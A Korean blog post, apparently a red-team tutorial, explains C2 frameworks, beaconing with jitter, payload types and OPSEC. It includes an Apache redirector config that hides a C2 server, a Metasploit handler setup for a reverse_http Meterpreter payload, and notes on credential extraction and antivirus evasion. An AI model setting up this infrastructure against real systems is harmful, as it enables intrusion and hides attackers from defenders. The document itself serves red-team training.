명령 및 제어(C2) 프레임워크 핵심 이해

C2 프레임워크 개요

명령 및 제어(Command and Control) 프레임워크는 레드팀 운영의 핵심 요소로, 침투된 시스템 관리와 내부 네트워크 이동을 효율화합니다. 주요 구성 요소와 작동 원리는 다음과 같습니다.

C2 서버와 에이전트

C2 서버는 중앙 제어 지점으로 작동하며, 에이전트는 대상 시스템에서 실행되어 서버의 명령을 실행합니다. Netcat 리스너와의 차이점은 세션 관리 기능과 확장성에 있습니다.

비콘 통신 메커니즘

에이전트는 정기적으로 C2 서버에 비콘을 전송합니다. 이 통신은 두 가지 기법으로 위장할 수 있습니다:

  • 슬립 타이머: 명령 대기 간격 제어
  • 지터: 통신 시간 임의 변동
import random
base_delay = 60
variation = random.randint(-15, 15)
adjusted_delay = base_delay + variation

페이로드 유형

유형특징동작 방식
스테이지리스완전한 에이전트 포함실행 즉시 비콘 시작
스테이지드다운로더 방식1단계: 초기 실행체 삽입
2단계: 추가 구성 요소 다운로드

주요 모듈 기능

  • 후침투 모듈: 초기 접근 후 활동 처리 (자격 증명 추출, 시스템 분석)
  • 피벗 모듈: 제한된 네트워크 세그먼트 접근 지원

주요 C2 프레임워크

오픈소스 솔루션

  • Metasploit: 종합적 취약점 활용 프레임워크
  • Armitage: Metasploit 기반 GUI 환경
  • Covenant: C# 기반 HTTP/HTTPS/SMB 지원

상용 솔루션

  • Cobalt Strike: 고급 레드팀 기능 통합
  • Brute Ratel: 맞춤형 적대적 시뮬레이션 환경

C2 운영 보안

OPSEC(작전 보안)은 C2 인프라 관리의 핵심입니다:

  • 공개 접근 차단: 관리 인터페이스 노출 최소화
  • SSH 터널 활용: 안전한 원격 접근 구성
  • ssh -L 55554:127.0.0.1:55554 user@c2_server

리스너 유형 비교

유형프로토콜탐지 위험도
표준TCP/UDP높음
HTTP/HTTPS웹 트래픽중간
DNS도메인 질의낮음

고급 구성: 리다이렉터

실제 C2 서버를 숨기기 위해 아파치 모듈을 활용한 리다이렉터 구성:

<VirtualHost *:80>
  RewriteEngine On
  RewriteCond %{HTTP_USER_AGENT} "^CustomAgent$"
  ProxyPass "/" "http://localhost:8080/"
</VirtualHost>

메타스플로이트 핸들러 설정:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set OverrideLHOST redirector_ip
set OverrideRequestHost true

선택 가이드

C2 프레임워크 선택 시 고려사항:

  • 목표 환경: 네트워크 제한 사항 분석
  • 예산: 상용/오픈소스 솔루션 비교
  • AV 회피: 커스텀 페이로드 생성 필요성

태그: C2프레임워크 레드팀 메타스플로이트 아미티지 페이로드

7월 17일 06:26에 게시됨